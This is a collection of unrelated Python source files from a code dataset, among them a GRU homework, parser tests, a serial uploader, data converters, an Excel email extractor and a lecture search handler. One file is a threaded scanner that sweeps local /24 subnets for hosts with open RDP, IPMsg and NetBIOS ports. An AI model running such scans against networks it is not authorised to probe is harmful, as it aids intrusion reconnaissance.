= input(\"Did you mean %s instead (y/n): \" % get_close_matches(w, data.keys())[0])\n        yn = input(f\"Did you mean {get_close_matches(word, data.keys())[0]} instead? Enter Y if yes, or N if no: \").lower()\n        if yn == \"y\":\n            print(data[get_close_matches(word, data.keys())[0]])\n        elif yn == \"n\":\n            print(\"The word doesn't exist. 
Please double check it.\")\n else:\n print(\"We didn't understand your entry.\")\n else:\n print(\"No word found!\")\n\nword = input(\"Enter the word: \")\nword = word.lower()\noutput = define(word)\nif type(output) == list:\n for item in output:\n print(item)\nelse:\n print(output)\n\n","sub_path":"sec_14_mysql/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"551481194","text":"import numpy as np\n\nHIDDEN_DIM = 4\n\nclass Sigmoid:\n # DO NOT DELETE\n def __init__(self):\n pass\n def forward(self, x):\n self.res = 1/(1+np.exp(-x))\n return self.res\n def backward(self):\n return self.res * (1-self.res)\n def __call__(self, x):\n return self.forward(x)\n\n\nclass Tanh:\n # DO NOT DELETE\n def __init__(self):\n pass\n def forward(self, x):\n self.res = np.tanh(x)\n return self.res\n def backward(self):\n return 1 - (self.res**2)\n def __call__(self, x):\n return self.forward(x)\n\nclass Linear():\n # DO NOT DELETE\n def __init__(self, in_feature, out_feature):\n self.in_feature = in_feature\n self.out_feature = out_feature\n\n self.W = np.random.randn(out_feature, in_feature)\n self.b = np.zeros(out_feature)\n \n self.dW = np.zeros(self.W.shape)\n self.db = np.zeros(self.b.shape)\n\n def __call__(self, x):\n return self.forward(x)\n\n def forward(self, x):\n self.x = x\n self.out = x.dot(self.W.T) + self.b\n return self.out\n\n def backward(self, delta):\n self.db = delta\n self.dW = np.dot(self.x.T, delta)\n dx = np.dot(delta, self.W.T)\n return dx\n\n\n\nclass GRU_Cell:\n \"\"\"docstring for GRU_Cell\"\"\"\n def __init__(self, in_dim, hidden_dim):\n self.d = in_dim\n self.h = hidden_dim\n h = self.h\n d = self.d\n self.x_t=0\n \n self.Wzh = np.random.randn(h,h)\n self.Wrh = np.random.randn(h,h)\n self.Wh = np.random.randn(h,h)\n \n self.Wzx = np.random.randn(h,d)\n self.Wrx = np.random.randn(h,d)\n self.Wx = np.random.randn(h,d)\n \n self.dWzh = np.zeros((h,h))\n self.dWrh = np.zeros((h,h))\n self.dWh = np.zeros((h,h))\n \n self.dWzx = np.zeros((h,d))\n self.dWrx = np.zeros((h,d))\n self.dWx = np.zeros((h,d))\n \n self.z_act = Sigmoid()\n self.r_act = Sigmoid()\n self.h_act = Tanh()\n \n # Define other variables to store forward results for backward here\n self.h_1 = 0 #to store h-1 in forward\n\n\n def init_weights(self, Wzh, Wrh, Wh, Wzx, Wrx, Wx):\n self.Wzh = Wzh\n self.Wrh = Wrh\n self.Wh = Wh\n self.Wzx = Wzx\n self.Wrx = Wrx\n self.Wx = Wx\n\n def __call__(self, x, h):\n return self.forward(x,h)\n\n def forward(self, x, h):\n \t# input:\n # - x: shape(input dim), observation at current time-step\n # - h: shape(hidden dim), hidden-state at previous time-step\n # \n # output:\n # - h_t: hidden state at current time-step\n #sigmoid = Sigmoid()\n #tanh = Tanh()\n \n self.h_1 = h #to store h-1 in forward\n self.x_t = x # to store x in forward\n\n self.z1 = self.Wzh.dot(h)\n self.z2 = self.Wzx.dot(x)\n self.z3 = self.z1 + self.z2\n self.z4 = self.z_act(self.z3) # self.z4 is zt\n\n self.z5 = self.Wrh.dot(h)\n self.z6 = self.Wrx.dot(x)\n self.z7 = self.z5 + self.z6\n self.z8 = self.r_act(self.z7)\n\n self.z9 = self.z8*h\n self.z10 = self.Wh.dot(self.z9)\n self.z11 = self.Wx.dot(x)\n self.z12 = self.z10 + self.z11\n self.z13 = self.h_act(self.z12)\n\n self.z15 = 1-self.z4\n self.z16 = self.z15*h\n self.z17 = self.z4*self.z13\n self.z18 = self.z16 +self.z17\n h_t = self.z18\n\n\n return h_t\n\n\n # This must calculate the gradients wrt the parameters and returns 
the derivative wrt the inputs, xt and ht, to the cell.\n def backward(self, delta):\n \t# input:\n # - delta: shape (hidden dim), summation of derivative wrt loss from next layer at\n # the same time-step and derivative wrt loss from same layer at\n # next time-step\n # output:\n # - dx: Derivative of loss wrt the input x\n # - dh: Derivative of loss wrt the input hidden h\n dz1 = 0\n dz2 = 0\n dz3 = 0\n dz4 = 0\n dz5 = 0\n dz6 = 0\n dz7 = 0\n dz8 = 0\n dz9 = 0\n dz10 = 0\n dz11 = 0\n dz12 = 0\n dz13 = 0\n dz14 = 0\n dz15 = 0\n dz16 = 0\n dz17 = 0\n dz18 = 0\n\n dh_1 = 0\n dx_t = 0\n\n t1,t2 = deriv(delta, self.z16, self.z17, \"+\")\n dz16 +=t1\n dz17 +=t2\n t1,t2 = deriv(dz17, self.z4, self.z13, \"o\")\n dz4 +=t1\n dz13 +=t2\n t1,t2 = deriv(dz16, self.z15, self.h_1, \"o\")\n dz15 +=t1\n dh_1 +=t2\n dz14 += -dz15 ####\n\n t1 = deriv(dz13, self.z12, self.z12, \"tanh\") # single value\n dz12 += t1\n t1,t2 = deriv(dz12, self.z10, self.z11, \"+\")\n dz10 +=t1\n dz11 +=t2\n t1,t2 = deriv(dz11, self.Wx, self.x_t, \"*\") ########## check if x is self.x\n self.dWx += t1\n dx_t += t2\n t1,t2 = deriv(dz10, self.Wh, self.z9, \"*\") ########## check if x is self.x\n self.dWh += t1\n dz9 += t2\n t1,t2 = deriv(dz9, self.z8, self.h_1, \"o\")\n dz8 +=t1\n dh_1 +=t2\n\n t1 = deriv(dz8, self.z7, self.z7, \"sigmoid\")\n dz7 +=t1\n t1,t2 = deriv(dz7, self.z5, self.z6, \"+\")\n dz5 +=t1\n dz6 +=t2\n t1,t2 = deriv(dz6, self.Wrx, self.x_t, \"*\") ########## check if x is self.x\n self.dWrx += t1\n dx_t += t2\n t1,t2 = deriv(dz5, self.Wrh, self.h_1, \"*\") ########## check if x is self.x\n self.dWrh += t1\n dh_1 += t2\n\n\n\n t1 = deriv(dz4, self.z3, self.z3, \"sigmoid\")\n dz3 +=t1\n t1,t2 = deriv(dz3, self.z1, self.z2, \"+\")\n dz1 +=t1\n dz2 +=t2\n t1,t2 = deriv(dz2, self.Wzx, self.x_t, \"*\") ########## check if x is self.x\n self.dWzx += t1\n dx_t += t2\n t1,t2 = deriv(dz1, self.Wzh, self.h_1, \"*\") ########## check if x is self.x\n self.dWzh += t1\n dh_1 += t2\n return dx_t, dh_1\n\n\ndef deriv(dz, x, y, op):\n\tif op == None:\n\t\treturn dz\n\t# component-wise “schur” multiply (??)\n\telif op==\"o\":\n\t\treturn dz*y.T , dz*x.T\n\t# Matrix multiply. X must be a matrix\n\telif op==\"*\":\n\t\tif y.ndim==1:\n\t\t\ty = y.reshape(-1,1)\n\t\treturn y.dot(dz), dz.dot(x)\n\telif op==\"+\":\n\t\treturn dz, dz\n\telif op==\"-\":\n\t\treturn dz, -dz\n # The following will expect a single argument\n\telif op==\"tanh\":\n\t\ttanh = Tanh()\n\t\treturn dz*(1-tanh(x)*tanh(x)).T\n\telif op==\"sigmoid\":\n\t\tsigmoid = Sigmoid()\n\t\treturn dz*sigmoid(x).T*(1-sigmoid(x)).T\n\t# The jacobian is the full derivative matrix of the sigmoid\t\n\telif op == \"softmax\":\n\t\t##\n\t\t#return dz*Jacobian(sigmoid,x)\n\t\ttemp = dz*sigmoid(x).T*(1-sigmoid(x)).T\n\t\treturn dz*temp #????\n\n\n\n\n# This is the neural net that will run one timestep of the input \n# You only need to implement the forward method of this class. \n# This is to test that your GRU Cell implementation is correct when used as a GRU. 
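The forward pass above implements the standard GRU update: z_t = sigmoid(Wzh·h + Wzx·x), r_t = sigmoid(Wrh·h + Wrx·x), h~ = tanh(Wh·(r_t ∘ h) + Wx·x), and h_t = (1 - z_t) ∘ h + z_t ∘ h~. A quick shape sanity check, assuming the GRU_Cell class above is importable as written:

    import numpy as np

    cell = GRU_Cell(in_dim=2, hidden_dim=HIDDEN_DIM)
    h = np.zeros(HIDDEN_DIM)   # previous hidden state
    x = np.ones(2)             # current observation
    h_next = cell(x, h)
    assert h_next.shape == (HIDDEN_DIM,)  # one hidden vector per time step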
\nclass CharacterPredictor(object):\n def __init__(self, input_dim, hidden_dim, num_classes):\n super(CharacterPredictor, self).__init__()\n # The network consists of a GRU Cell and a linear layer \n\n def init_rnn_weights(self, w_hi, w_hr, w_hn, w_ii, w_ir, w_in):\n # DO NOT MODIFY\n self.rnn.init_weights(w_hi, w_hr, w_hn, w_ii, w_ir, w_in) \n\n def __call__(self, x, h):\n return self.forward(x, h) \n\n def forward(self, x, h):\n # A pass through one time step of the input \n raise NotImplementedError\n\n# An instance of the class defined above runs through a sequence of inputs to generate the logits for all the timesteps. \ndef inference(net, inputs):\n # input:\n # - net: An instance of CharacterPredictor\n # - inputs - a sequence of inputs of dimensions [seq_len x feature_dim]\n # output:\n # - logits - one per time step of input. Dimensions [seq_len x num_classes]\n raise NotImplementedError\n","sub_path":"hw3_p1/gru.py","file_name":"gru.py","file_ext":"py","file_size_in_byte":7908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"285024787","text":"import sys\n\nimport pytest\nfrom lxml import etree\n\nfrom sheepdog.utils.transforms import BcrClinicalXmlToJsonParser\nfrom sheepdog.xml import EvaluatorFactory\nfrom sheepdog.xml.evaluators.fields import (\n BasicEvaluator,\n FilterElementEvaluator,\n LastFollowUpEvaluator,\n TreatmentTherapyEvaluator,\n VitalStatusEvaluator,\n)\n\n\n@pytest.mark.parametrize(\"evaluator, expected\", [\n ({}, BasicEvaluator),\n (dict(name=\"filter\"), FilterElementEvaluator),\n (dict(name=\"last_follow_up\"), LastFollowUpEvaluator),\n (dict(name=\"vital_status\"), VitalStatusEvaluator),\n (dict(name=\"treatment_therapy\"), TreatmentTherapyEvaluator),\n])\ndef test_evaluator_factory(xml_fixture, evaluator, expected):\n\n xml = etree.fromstring(xml_fixture)\n nspace = xml.nsmap\n ev = EvaluatorFactory.get_instance(xml, nspace, dict(evaluator=evaluator))\n assert isinstance(ev, expected)\n\n\ndef test_bcr_parsing(xml_fixture):\n\n parser = BcrClinicalXmlToJsonParser(project_code=None)\n parser.loads(xml_fixture)\n\n # 5 nodes expected\n # 1 demographics, 1 diagnosis, 1 exposure, 2 treatment\n assert 5 == len(parser.docs)\n\n nodes_found = 0\n treatment_nodes = 0\n for node_json in parser.docs:\n # assert demographics contents\n if node_json[\"type\"] == \"demographic\":\n assert \"vital_status\" in node_json\n assert node_json[\"vital_status\"] == \"Dead\"\n nodes_found += 1\n elif node_json[\"type\"] == \"diagnosis\":\n assert node_json[\"days_to_last_follow_up\"] == 4549\n nodes_found += 1\n elif node_json[\"type\"] == \"exposure\":\n nodes_found += 1\n elif node_json[\"type\"] == \"treatment\":\n treatment_nodes += 1\n assert nodes_found + treatment_nodes == 5\n assert treatment_nodes == 2\n","sub_path":"tests/unit/xml/test_node_evaluators.py","file_name":"test_node_evaluators.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"537099936","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('museos', '0002_auto_20180514_1300'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Comentario',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, 
auto_created=True, primary_key=True)),\n ('comentario', models.TextField(default=b'DEFAULT_VALUE')),\n ('museo', models.ForeignKey(to='museos.Museo')),\n ],\n ),\n migrations.CreateModel(\n name='Seleccion',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('museos_fav', models.ManyToManyField(to='museos.Museo')),\n ('propietario', models.OneToOneField(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.DeleteModel(\n name='Post',\n ),\n ]\n","sub_path":"guiamuseos/museos/migrations/0003_auto_20180518_1128.py","file_name":"0003_auto_20180518_1128.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"185499306","text":"#!/usr/bin/env python WARNING: This is a TTL serial port 3.3 volts!\r\n\r\n#SETUP --------------------------------------------\r\n#this imports the libraries needed\r\nimport serial, time, urllib, urllib2\r\n\r\n#This sets up the serial port ttyAMA0 GPIO. baud rate is the bits per second.\r\nport = serial.Serial(\"/dev/ttyAMA0\", baudrate=2400, timeout=1)\r\n#delay start\r\n\r\n#SEND TO SERVER ----------------------------------\r\ndef send(channel,node,data):\r\n url = 'http://markers.mtaspiring.school.nz/api/marker'\r\n data = {\r\n 'user_id' : '2',\r\n 'node' : node,\r\n 'channel' : channel,\r\n 'latitude' : '',\r\n 'longitude' : '',\r\n 'elevation' : '',\r\n 'data' : data\r\n }\r\n\r\n data_encoded = urllib.urlencode(data)\r\n req = urllib2.Request(url, data_encoded)\r\n response = urllib2.urlopen(req)\r\n #print response.read()\r\n\r\n#READ SERIAL --------------------------------------------\r\nport.flushInput()\r\nwhile True:\r\n try:\r\n rcv = port.readline() #read buffer until cr/lf\r\n if(rcv):\r\n rcv = rcv.rstrip(\"\\r\\n\")\r\n if len(rcv) > 5:\r\n channel,node,data = rcv.split(\",\")\r\n if len(channel) == 1 and len(node) < 3:\r\n print(\"rcv: \" + channel + node + data)\r\n send(channel, node, data)\r\n except ValueError:\r\n #print(\"opps...\")\r\n port.flushInput()\r\n ","sub_path":"MQTTupload/markers1704.py","file_name":"markers1704.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"361225015","text":"#!/usr/bin/python\n\n# Convert SolarEdge inverter performance monitoring data from JSON to CSV\n\nimport getopt\nimport json\nimport sys\n\nfrom seDataParams import *\n\n# file parameters\ninFileName = \"\"\ninvFileName = \"\"\noptFileName = \"\"\nheaders = False\ndelim = \",\"\nwriteMode = \"w\"\ninvSeq = 0\noptSeq = 0\n\ndef openInFile(inFileName):\n if inFileName == \"stdin\":\n return sys.stdin\n else:\n return open(inFileName)\n\n# open the specified input file\ndef openInput(inFileName):\n return openInFile(inFileName)\n\n# close the input file\ndef closeInput(dataFile):\n dataFile.close()\n\n# open in output file if it is specified\ndef openOutFile(fileName, writeMode=\"w\"):\n if fileName != \"\":\n return open(fileName, writeMode)\n\n# open the output files\ndef openOutFiles(invFileName, optFileName):\n invFile = openOutFile(invFileName, writeMode)\n optFile = openOutFile(optFileName, writeMode)\n return (invFile, optFile)\n \n# close output files \ndef closeOutFiles(invFile, optFile):\n if invFile:\n invFile.close()\n if optFile:\n optFile.close()\n\n# write output file headers\ndef writeHeaders(outFile, items):\n outFile.write(delim.join(item for item in items)+\"\\n\")\n\n# write data to output 
files\ndef writeData(msgDict, invFile, optFile):\n global invSeq, optSeq\n if invFile:\n if headers and (invSeq == 0) and (msgDict[\"inverters\"] != {}):\n writeHeaders(invFile, invItems)\n for seId in msgDict[\"inverters\"].keys():\n invSeq = writeDevData(invFile, invOutFmt, msgDict[\"inverters\"][seId], invItems, invSeq)\n if optFile:\n if headers and (optSeq == 0) and (msgDict[\"optimizers\"] != {}):\n writeHeaders(optFile, optItems)\n for seId in msgDict[\"optimizers\"].keys():\n optSeq = writeDevData(optFile, optOutFmt, msgDict[\"optimizers\"][seId], optItems, optSeq)\n\n# write device data to output file\ndef writeDevData(outFile, outFmt, devDict, devItems, devSeq):\n if outFile:\n outMsg = delim.join([(outFmt[i] % devDict[devItems[i]]) for i in range(len(devItems))])\n devSeq += 1\n outFile.write(outMsg+\"\\n\")\n return devSeq\n\n# get program arguments and options\n(opts, args) = getopt.getopt(sys.argv[1:], \"ad:hi:o:\")\n\ntry:\n inFileName = args[0]\nexcept:\n inFileName = \"stdin\"\nfor opt in opts:\n if opt[0] == \"-a\":\n writeMode = \"a\"\n elif opt[0] == \"-d\":\n delim = opt[1] \n elif opt[0] == \"-h\":\n headers = True\n elif opt[0] == \"-i\":\n invFileName = opt[1]\n elif opt[0] == \"-o\":\n optFileName = opt[1]\n\n# process the data\ninFile = openInput(inFileName)\n(invFile, optFile) = openOutFiles(invFileName, optFileName)\nfor jsonStr in inFile:\n writeData(json.loads(jsonStr), invFile, optFile)\ncloseInput(inFile)\ncloseOutFiles(invFile, optFile)\n \n\n","sub_path":"se2csv.py","file_name":"se2csv.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"213935335","text":"'''\r\nCreated on May 9, 2018\r\n\r\n@author: xuwang\r\n'''\r\nimport cv2\r\nimport argparse\r\nimport os\r\nimport imutils\r\n#------------------------------------------------------------------------\r\nap = argparse.ArgumentParser()\r\nap.add_argument(\"-s\", \"--srcPath\", required=True,\r\n help=\"source image folder\")\r\nap.add_argument(\"-t\", \"--tgtPath\", required=True,\r\n help=\"target folder to save the maker list\")\r\nap.add_argument(\"-a\", \"--angle\", required=True,\r\n help=\"angle to rotate\")\r\nap.add_argument(\"-cp\", \"--cropPercent\", required=True, nargs='+',\r\n help=\"height and width to crop\")\r\nap.add_argument(\"-r\", \"--ratio\", required=True,\r\n help=\"ratio for shrinking\")\r\nargs = ap.parse_args()\r\nworkingPath = args.srcPath\r\ntargetPath = args.tgtPath\r\nang = float(args.angle)\r\ncp = args.cropPercent\r\nr = float(args.ratio)\r\n# print(float(cp[1]))\r\nimageFiles = os.listdir(workingPath)\r\nrgbIm = []\r\nfor im in imageFiles:\r\n if im.find(\".jpg\") != -1:\r\n rgbIm.append(im)\r\n# Detect each individual image\r\nfor imf in rgbIm: \r\n imgFile = cv2.imread(workingPath+\"\\\\\"+imf)\r\n rotated = imutils.rotate(imgFile, ang)\r\n imgCrop = rotated[(int(rotated.shape[0]*(float(cp[0])))):(int(rotated.shape[0]*(float(cp[1])))-1), (int(rotated.shape[1]*(float(cp[2])))):(int(rotated.shape[1]*(float(cp[3])))-1)] \r\n resizedImage = cv2.resize(imgCrop, (int(imgCrop.shape[1] * r), int(imgCrop.shape[0] * r)), interpolation = cv2.INTER_AREA)\r\n print(targetPath+\"\\\\\"+imf)\r\n cv2.imwrite(targetPath+\"\\\\\"+imf, resizedImage)\r\n\r\n","sub_path":"imgCropSave.py","file_name":"imgCropSave.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"294268034","text":"import 
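For reference, the crop script above expects -cp as four fractions in the order top, bottom, left, right, applied after rotation and before resizing. A hypothetical invocation (folder names and values are illustrative only):

    python imgCropSave.py -s ./frames -t ./cropped -a 15 -cp 0.1 0.9 0.2 0.8 -r 0.5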
socket\r\nimport threading\r\nfrom ipPool import ipTableModel\r\n\r\n# Business logic layer\r\n# List that accumulates the discovered hosts\r\nrouters = []\r\n# Mutex protecting the shared counter and list\r\nlock = threading.Lock()\r\n# Ports to scan\r\nport_list = ['3389', '2425', '139']\r\n# Counter\r\ncount = 0\r\n# Scan the local subnets for reachable hosts; returns the number of new entries\r\ndef search_routers(obj):\r\n    # Get the list of local IP addresses\r\n    local_ips = socket.gethostbyname_ex(socket.gethostname())[2]\r\n    # Pool holding the worker threads\r\n    all_threads = []\r\n    # Loop over the local NIC IPs\r\n    for ip in local_ips:\r\n        for i in range(1, 255):\r\n            # Split the NIC IP on '.' so every address in the /24 can be generated\r\n            array = ip.split('.')\r\n            # Replace the fourth octet to enumerate each host in the subnet\r\n            array[3] = str(i)\r\n            # Re-join the octets with '.' to form the candidate IP\r\n            new_ip = '.'.join(array)\r\n            # print(new_ip)\r\n            # Iterate over the ports to scan\r\n            for port in port_list:\r\n                dst_port = int(port)\r\n                # Spawn a thread to probe this address\r\n                t = threading.Thread(target=check_ip, args=(new_ip, dst_port) )\r\n                t.start()\r\n                # Keep the new thread in the pool\r\n                all_threads.append(t)\r\n    # Join every worker so the program exits only after all scans finish\r\n    for t in all_threads:\r\n        t.join()\r\n    return count\r\n\r\n\r\n# Probe a single (ip, port) pair\r\ndef check_ip(new_ip, port):\r\n    global count\r\n    # Create a TCP socket to probe the candidate address\r\n    scan_link = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n    # Connection timeout\r\n    scan_link.settimeout(2)\r\n    # connect_ex returns 0 when the target accepts the connection on that port\r\n    result = scan_link.connect_ex((new_ip, port))\r\n    #\r\n    scan_link.close()\r\n    # print(result)\r\n    # Evaluate the connection result\r\n    if result == 0:\r\n        # Acquire the lock\r\n        lock.acquire()\r\n        print(new_ip, '\\t\\t端口号%s开放' % port)  # i.e. 'port %s is open'\r\n        IsExist=ipTableModel.Add(new_ip, port)\r\n        if(IsExist):\r\n            count += 1\r\n        routers.append((new_ip, port))\r\n        # Release the lock\r\n        lock.release()\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"ipPool/SearchLayer.py","file_name":"SearchLayer.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"350661863","text":"import os\nimport time,re\npath=os.getcwd()\nch1=open(\"char映射.txt\",'r')\nchar1=ch1.readlines()\nf=open(path+\"/name.txt\",'r')\no=open(path+\"/name_反映射.txt\",'w+')\nline = f.readline()\ncharor=[]\nfor cha in char1:\n    charor.append(cha[0])\nwhile line:\n    tr=False\n    data=\"\"\n    #line=line.replace('姉','姐').replace('嶺','岭').replace(\"愛\",\"爱\").replace(\"●\",\"我\")\n    #line=line.replace(\"●\",\"我\")\n    line=line.replace(\"\\n\",\"\")\n    for num in range(len(line)):\n        if line[num]=='▲':\n            tr=bool(1-tr)\n#            print(line[num],tr)\n        if tr:\n            data=data+line[num]\n        else:\n            try:\n                i=charor.index(line[num])\n                data=data+char1[i][1]\n#                print(data)\n            except ValueError:\n                data=data+line[num]\n    line=data+\"\\n\"\n    o.write(line)\n    line=f.readline()\nf.close()\no.close()\nprint(\"完成\")  # 'Done'\n","sub_path":"Text反映射V2.py","file_name":"Text反映射V2.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"74596701","text":"# -*- coding: utf-8 -*-\n# @Time : 19-3-21\n# @Author : hay\nimport csv\nimport xlrd\nimport xlsxwriter\n\n\nclass ExcelBase(object):\n\n    workbook = None\n\n    def open_workbook(self, filename, **kwargs):\n        self.workbook = xlrd.open_workbook(filename, **kwargs)\n\n    def sheet_names(self):\n        return self.workbook.sheet_names()\n\n    def create_xlsx(self, file_name):\n        \"\"\"Create and open a workbook file\"\"\"\n        return xlsxwriter.Workbook(file_name)\n\n\nclass ExcelEmail(ExcelBase):\n\n    sheet = None\n    sheets = []\n    nrows = 0\n\n    def getExcelEmail(self, filename, **kwargs):\n        self.open_workbook(filename, **kwargs)\n        self.sheets = self.sheet_names()\n        ret_email = set()\n        for sheet_name in self.sheets:\n            sheetObj = self.workbook.sheet_by_name(sheet_name)\n            self.nrows = sheetObj.nrows\n            if 
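On the scanner above: socket.connect_ex returns an error code instead of raising, so 0 means the TCP handshake succeeded, which is why the check is result == 0. The same probe in isolation, for reference (host and port are illustrative):

    import socket

    def port_open(host, port, timeout=2.0):
        # True if a TCP connection to (host, port) succeeds within the timeout.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            return s.connect_ex((host, port)) == 0

    print(port_open('127.0.0.1', 3389))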
self.nrows:\n                for row in range(self.nrows):\n                    rowList = sheetObj.row_values(row)\n                    for rl in rowList:\n                        if not isinstance(rl, str):\n                            continue\n                        if rl and '@' in rl:\n                            ret_email.add(rl.lower())\n                            break\n        return ret_email\n\n    def getExcelFirstSheetDatas(self, filename, **kwargs):\n        self.open_workbook(filename, **kwargs)\n        self.sheets = self.sheet_names()\n        ret_data = []\n        if self.sheets:\n            sheetObj = self.workbook.sheet_by_name(self.sheets[0])\n            self.nrows = sheetObj.nrows\n            if self.nrows:\n                for row in range(self.nrows):\n                    rowList = sheetObj.row_values(row)\n                    ret_data.append(rowList)\n        return ret_data\n\n    def getExcelFirstDatasDict(self, filename, **kwargs):\n        self.open_workbook(filename, **kwargs)\n        self.sheets = self.sheet_names()\n        ret_data = {}\n        if self.sheets:\n            sheetObj = self.workbook.sheet_by_name(self.sheets[0])\n            self.nrows = sheetObj.nrows\n            if self.nrows:\n                for row in range(self.nrows):\n                    rowList = sheetObj.row_values(row)\n                    try:\n                        ret_data.update({rowList[0].lower(): rowList})\n                    except Exception:\n                        continue\n        return ret_data\n\n    def getExcelDatas(self, filename, **kwargs):\n        self.open_workbook(filename, **kwargs)\n        self.sheets = self.sheet_names()\n        sheet_dict = {}\n        ret_email = []\n        for sheet_name in self.sheets:\n            sheet_dict.update({sheet_name: []})\n            sheetObj = self.workbook.sheet_by_name(sheet_name)\n            self.nrows = sheetObj.nrows\n            if self.nrows:\n                for row in range(self.nrows):\n                    rowList = sheetObj.row_values(row)\n                    sheet_dict[sheet_name].append(rowList)\n        return sheet_dict\n\n\nclass CsvEmail(object):\n\n    def readCsv(self, file, encoding=\"utf-8\"):\n        try:\n            f = open(file, 'r', encoding=encoding)\n            return list(csv.reader(f))\n        except Exception as e:\n            print(e)\n            return []\n\n    def getCsvFirstDatasDict(self, file, encoding=\"utf-8\"):\n        rdict = {}\n        try:\n            f = open(file, 'r', encoding=encoding)\n            l = list(csv.reader(f))\n            for row in l:\n                try:\n                    rdict.update({row[0].lower(): row})\n                except Exception:\n                    continue\n            return rdict\n        except Exception as e:\n            return rdict","sub_path":"core/excelHelper.py","file_name":"excelHelper.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"419786903","text":"# -*- coding: utf-8 -*-\r\nfrom TuanTuan.TuanTuanApp.models import Lecture\r\nfrom TuanTuan.TuanTuanApp.TextHandler.common import *\r\nfrom TuanTuan.TuanTuanApp.participle import *\r\n########################################################################\r\nclass LectureHandler:\r\n    \"\"\"Handles lecture queries\"\"\"\r\n\r\n    #----------------------------------------------------------------------\r\n    def __init__(self, data=[], rawInput='', tags=[]):\r\n        \"\"\"Constructor\"\"\"\r\n        self.data = data\r\n        self.rawInput = rawInput\r\n        self.tags = tags\r\n        self.nextHandler = None\r\n    \r\n    #----------------------------------------------------------------------\r\n    def handle(self, current=[]): \r\n        \"\"\"Flag marking whether the next handler still needs to run\"\"\"\r\n        needNextFlag = True\r\n        \"\"\"Do this layer's processing\"\"\"\r\n        all_data = Lecture.objects.all()\r\n        time = {'start' : [], 'end' : []}\r\n        \"\"\"mark tracks how much of the query was matched\"\"\"\r\n        mark = {'mark' : 0}\r\n        mark_title = {'mark' : 0}\r\n        mark_site = {'mark' : 0}\r\n        mark_time = {'mark' : 0}\r\n        \"\"\"Try to extract an exact location; if one is found, match on it directly\"\"\"\r\n        accurate_location = get_accurate_location(self.rawInput)\r\n        if accurate_location != \"\" and check_same_in_list(['bt', 'sj'], self.tags) == False:\r\n            result = match_accurate_location(all_data, accurate_location)\r\n            if len(result) != 0:\r\n                mark_site['mark'] = len(self.rawInput)\r\n        else:\r\n            
\"\"\"过滤分词结果中的无用部分\"\"\"\r\n filter_keywords_result = filter_keywords(self.data, self.tags)\r\n \"\"\"统计去除无用部分之后的总字数\"\"\"\r\n mark_keywords = get_mark_keywords(filter_keywords_result)\r\n \"\"\"初始化查询结果\"\"\"\r\n query_title = set()\r\n query_site = set()\r\n query_time = set()\r\n \"\"\"首先进行标题的匹配\"\"\"\r\n if check_same_in_list(['dd', 'sj'], self.tags) == False:\r\n query_title = filter_title__contains(all_data, filter_keywords_result, mark_title)\r\n \"\"\"然后进行地点的匹配\"\"\"\r\n if check_same_in_list(['bt', 'sj'], self.tags) == False:\r\n query_site = filter_site__contains(all_data, filter_keywords_result, mark_site)\r\n \"\"\"最后进行时间的匹配\"\"\"\r\n if check_same_in_list(['bt', 'dd'], self.tags) == False:\r\n timeProcess = TimeProcess(words = self.data)\r\n time = time_merge(timeProcess.getTimes())\r\n timeProcess.extraTime(time)\r\n query_time = filter_time(all_data, time)\r\n if len(query_time) != 0:\r\n mark_time['mark'] = len(time['start']) * 4\r\n \"\"\"进行结果的处理,如果标题全部匹配上,只考虑标题,如果地点全部匹配上,只考虑地点\"\"\"\r\n if mark_title['mark'] == mark_keywords and mark_title['mark'] != 0 and len(query_time) == 0:\r\n result = query_title\r\n elif mark_site['mark'] == mark_keywords and mark_site['mark'] != 0 and len(query_time) == 0:\r\n result = query_site\r\n else:\r\n result = query_title & query_site\r\n if len(result) == 0:\r\n result = query_title | query_site\r\n \"\"\"如果检测到有输入时间,则输入的时间一定是用来限制结果的\"\"\"\r\n if len(time['start']) != 0 and len(filter_keywords_result) != 0:\r\n result = result & query_time\r\n if len(time['start']) != 0 and len(filter_keywords_result) == 0:\r\n result = query_time\r\n \"\"\"根据三个部分的mark确定结果的mark\"\"\"\r\n if mark_title['mark'] >= mark_site['mark'] and mark_title['mark'] >= mark_time['mark']:\r\n mark['mark'] = mark_title['mark'] + mark_site['mark'] * 0.2 + mark_time['mark'] * 0.2\r\n elif mark_site['mark'] >= mark_title['mark'] and mark_site['mark'] >= mark_time['mark']:\r\n mark['mark'] = mark_site['mark'] + mark_title['mark'] * 0.2 + mark_time['mark'] * 0.2\r\n else:\r\n mark['mark'] = 